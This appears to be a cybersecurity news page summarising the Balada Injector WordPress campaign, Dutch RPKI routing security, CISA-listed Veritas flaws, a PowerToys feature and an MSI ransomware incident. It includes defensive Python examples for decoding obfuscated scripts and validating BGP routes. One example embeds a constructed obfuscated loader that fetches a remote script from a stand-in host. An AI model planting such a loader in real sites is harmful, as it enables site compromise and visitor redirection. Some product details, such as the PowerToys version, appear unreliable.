Hackerzhome

Cybersecurity news all over the world

HACKERZHOME NEWS

April 10, 2023

Monday

Balada Injector Malware Operation Has Affected More Than 1 Million WordPress Sites

A malware campaign known as Balada Injector is reported to have compromised more than one million WordPress websites since 2017.


According to GoDaddy's Sucuri, the large-scale campaign exploits all known and recently discovered theme and plugin vulnerabilities to compromise WordPress websites. The attacks are known to arrive in waves every few weeks.


Security researcher Dmitry Sinegubko noted that the campaign is easily recognized by its preference for String.fromCharCode obfuscation, its use of newly registered domain names that host malicious scripts on random subdomains, and its redirects to numerous scam websites.
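A triage helper for the first of those traits, as an added example (not code from Sucuri or the report): it recovers the strings hidden behind literal String.fromCharCode(...) calls in an injected script and flags loader URLs whose leading hostname label is not on a small allowlist. The sample script, the allowlist and the "random subdomain" heuristic are assumptions constructed for this example.

```python
import re

# Constructed sample of an injected loader, not a real Balada payload.
# The character codes spell out a URL on a made-up host.
SAMPLE_SCRIPT = (
    'var u=String.fromCharCode(104,116,116,112,115,58,47,47,97,98,99,46,101,120,97,'
    '109,112,108,101,45,99,100,110,46,116,101,115,116,47,115,46,106,115);'
    'var s=document.createElement("script");s.src=u;document.head.appendChild(s);'
)

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def decode_fromcharcode(src):
    """Decode every String.fromCharCode call whose arguments are literal integers."""
    decoded = []
    for match in FROMCHARCODE.finditer(src):
        codes = [int(c) for c in match.group(1).split(",") if c.strip().isdigit()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def suspicious_hosts(decoded, allowed_labels=("www", "cdn", "static")):
    """Return hosts found in decoded strings whose leading label is outside the
    allowlist. This is an assumed heuristic for the 'random subdomain' trait;
    a check for newly registered domains would additionally need RDAP/WHOIS data."""
    hosts = []
    for text in decoded:
        for host in URL_HOST.findall(text):
            labels = host.lower().split(".")
            if len(labels) >= 3 and labels[0] not in allowed_labels:
                hosts.append(host.lower())
    return hosts


if __name__ == "__main__":
    strings = decode_fromcharcode(SAMPLE_SCRIPT)
    print("decoded:", strings)
    print("suspicious hosts:", suspicious_hosts(strings))
```

Run it over theme and plugin files (or rendered HTML) with a loop around decode_fromcharcode to surface hosts worth checking against the site's own known resources.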


These websites include fake tech support pages, fake lottery winnings, and malicious CAPTCHA pages that urge users to enable notifications so that the actors can send spam emails.


The study builds on recent findings from Doctor Web, which described a family of Linux malware that compromises poorly protected WordPress sites by exploiting flaws in more than two dozen plugins and themes.


Over the years, Balada Injector has used more than 100 sites and a wide range of techniques to exploit well-known security holes (such as HTML injection and Site URL).


The attackers primarily aim to steal database credentials from the wp-config.php file.

The use of RPKI by all Dutch government networks will stop BGP hijacking.

By implementing the Resource Public Key Infrastructure (RPKI) standard by the end of 2024, the Netherlands government will increase the security of its internet routing.

RPKI, also called Resource Certification, cryptographically verifies routes and so guards against the incorrect rerouting of internet traffic, whether deliberate or accidental.

The standard uses digital certificates to secure the Border Gateway Protocol (BGP), which is used to exchange routing information. This ensures that traffic passes through the authorized network operator in charge of the IP addresses on the target path.

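To show what the certificate-based check actually decides, here is an added example (not code from the Dutch government's deployment or from any RPKI validator) of Route Origin Validation as RFC 6811 defines it: each announced prefix and origin AS is compared against Route Origin Authorizations (ROAs), which are the signed objects RPKI publishes. The ROAs, prefixes and AS numbers below are constructed for this example.

```python
import ipaddress

# Constructed ROAs: (authorized prefix, maximum prefix length, authorized origin ASN).
# In a real deployment these come from validated RPKI repositories, not a literal list.
ROAS = [
    ("192.0.2.0/24", 24, 64496),
    ("198.51.100.0/22", 24, 64497),
]


def covering_roas(prefix, roas):
    """ROAs whose prefix covers the announced prefix (same address family)."""
    net = ipaddress.ip_network(prefix)
    covering = []
    for roa_prefix, max_len, asn in roas:
        roa_net = ipaddress.ip_network(roa_prefix)
        if roa_net.version == net.version and net.subnet_of(roa_net):
            covering.append((roa_net, max_len, asn))
    return covering


def validate(prefix, origin_asn, roas=ROAS):
    """Return 'valid', 'invalid' or 'notfound' for an announced prefix/origin pair
    following the RFC 6811 decision: no covering ROA -> notfound; a covering ROA
    with matching origin and prefix length <= maxLength -> valid; otherwise invalid."""
    net = ipaddress.ip_network(prefix)
    covering = covering_roas(prefix, roas)
    if not covering:
        return "notfound"  # RPKI has no opinion about this address space
    for _, max_len, asn in covering:
        if asn == origin_asn and net.prefixlen <= max_len:
            return "valid"
    return "invalid"  # covered space, but wrong origin or a too-specific announcement


if __name__ == "__main__":
    # Constructed announcements: legitimate, hijacked origin, too-specific, unknown.
    for prefix, asn in [("192.0.2.0/24", 64496), ("192.0.2.0/24", 64666),
                        ("198.51.100.0/25", 64497), ("203.0.113.0/24", 64498)]:
        print(prefix, "AS" + str(asn), "->", validate(prefix, asn))
```

A router doing ROV typically drops "invalid" routes and accepts "notfound" ones, which is why the protection only covers prefixes whose holders have published ROAs.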


Five actively exploited security flaws are reported by CISA; immediate action is required.

Citing evidence of active exploitation in the wild, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws to its Known Exploited Vulnerabilities (KEV) catalog.

These include three critical flaws (CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878) in the Veritas Backup Exec Agent software that could allow privileged commands to be executed on vulnerable systems.

According to a report released last week by Google-owned Mandiant, an affiliate of the BlackCat (also known as ALPHV and Noberus) ransomware operation is targeting publicly exposed Veritas Backup Exec installations to gain initial access through the three flaws above.

The threat intelligence company, which tracks the affiliate under the uncategorized alias UNC4466, said it first observed the flaws being exploited in the wild on October 22, 2022.

In one incident described by Mandiant, UNC4466 gained access to an internet-exposed Windows server and then carried out a series of operations that let the attacker deploy the Rust-based ransomware payload.

Before doing so, however, the attacker conducted reconnaissance, escalated privileges, and disabled Microsoft Defender's real-time monitoring feature.

Windows Registry preview is now available in Microsoft PowerToys.

Microsoft PowerToys, a collection of free utilities for Windows 10 users, has gained a new feature that lets users inspect the contents of registry files before importing them.

Registry files contain instructions for changing the Windows registry, a database that holds settings for the operating system and applications.

Through the registry, the behavior of Windows can be altered in many ways, including its appearance, performance, security, and compatibility.

Registry Preview, a new PowerToys utility, aims to make this procedure simpler and safer.

Instead of opening or directly importing registry files, users can inspect their contents through a graphical user interface (GUI).

Users can also compare a file's contents with the registry's current values to see what changes an import would make.

The feature is currently in preview and requires PowerToys version v69 or later. Users can enable it by going to PowerToys > Plugins > Registry Preview and turning on the toggle switch.

Microsoft says that because the feature is still under development it may have flaws or limitations, and encourages users to leave feedback and suggestions on the company's GitHub page.

MSI, a Taiwanese computer manufacturer, hit by ransomware attack

Taiwanese PC manufacturer MSI (short for Micro-Star International) has officially confirmed that one of its systems was the target of a cyberattack.

The company said it "promptly" began incident response and recovery measures after becoming aware of "network issues," and that it has notified law enforcement.

However, MSI did not disclose when the attack took place or whether any confidential data, including source code, was exfiltrated.

The affected systems have progressively resumed normal operations with little to no impact on financial activities, according to a brief notice the company released on Friday.

In a regulatory filing with the Taiwan Stock Exchange, the company said it is implementing tighter controls over its network and infrastructure to ensure the protection of data.

MSI also advises customers to avoid downloading files from unofficial websites and to obtain firmware and BIOS updates only from the company's official website.
